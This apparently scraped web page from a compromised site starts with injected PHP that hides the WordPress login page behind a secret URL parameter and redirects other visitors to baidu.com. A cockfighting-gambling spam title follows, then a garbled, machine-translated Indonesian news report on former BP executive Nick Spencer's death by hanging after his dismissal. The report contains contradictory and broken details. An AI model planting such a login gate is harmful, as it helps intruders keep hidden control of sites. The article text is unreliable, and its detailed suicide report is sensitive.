//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Nick Spencer, mantan wakil ketua BP, meninggal di rumahnya setelah dipecat | download game adu ayam_s128live_situs sabung ayam online

Nick Spencer, mantan wakil ketua BP, meninggal di rumahnya setelah dipecat

TRIBUNNEWS.COM, Mantan Wakil Presiden BP Buckingham City Nick Spencer digantung di mansionnya pada Rabu (30/9/2020). Insiden itu terjadi seminggu setelah dia dipecat oleh seorang eksekutif perusahaan.

Tubuh Nick Spencer yang berusia 61 tahun digantung di rumahnya yang bernilai 2 juta poundsterling di Buckinghamshire, Inggris. Sebelum raksasa minyak British Petroleum (BP), ia terpaksa meninggalkan perusahaan pada 31 Maret 2020.

Istrinya Eve (Hawa) mengatakan bahwa suaminya menjadi frustasi ketika mengetahui bahwa dia dipecat oleh perusahaan, seperti dikutip dari Daily Mail. Mencari pekerjaan baru, menurut saya dia terlihat sangat positif, tetapi karena krisis minyak yang disebabkan oleh Covid-19, dia khawatir akan sulit untuk menata kembali rumah dan situasi keuangannya. -Selanjutnya mengatakan bahwa sampai kematiannya, Spencer terlihat sedih dan bahkan merayakan ulang tahun pernikahannya yang ke-12. -Orang pertama yang tiba di rumah Beaconsfield Di Beaconsfield, Buckinghamshire, tubuh Spencer ditemukan di garasi garasi. Rumahnya.

Wanita itu mengidentifikasi mayatnya sebagai suaminya pada pukul 10.30 Rabu lalu. -Paparan jangka panjang terhadap pikiran-pikiran untuk bunuh diri-Dalam laporan peninjauan tersebut, psikiater mengonfirmasi untuk bertemu dengan Spencer pada 18 Januari 2020. Saat itu, Spencer memberitahunya bahwa pekerjaannya akan segera berakhir.

Leave a Comment

download game adu ayam_s128live_situs sabung ayam online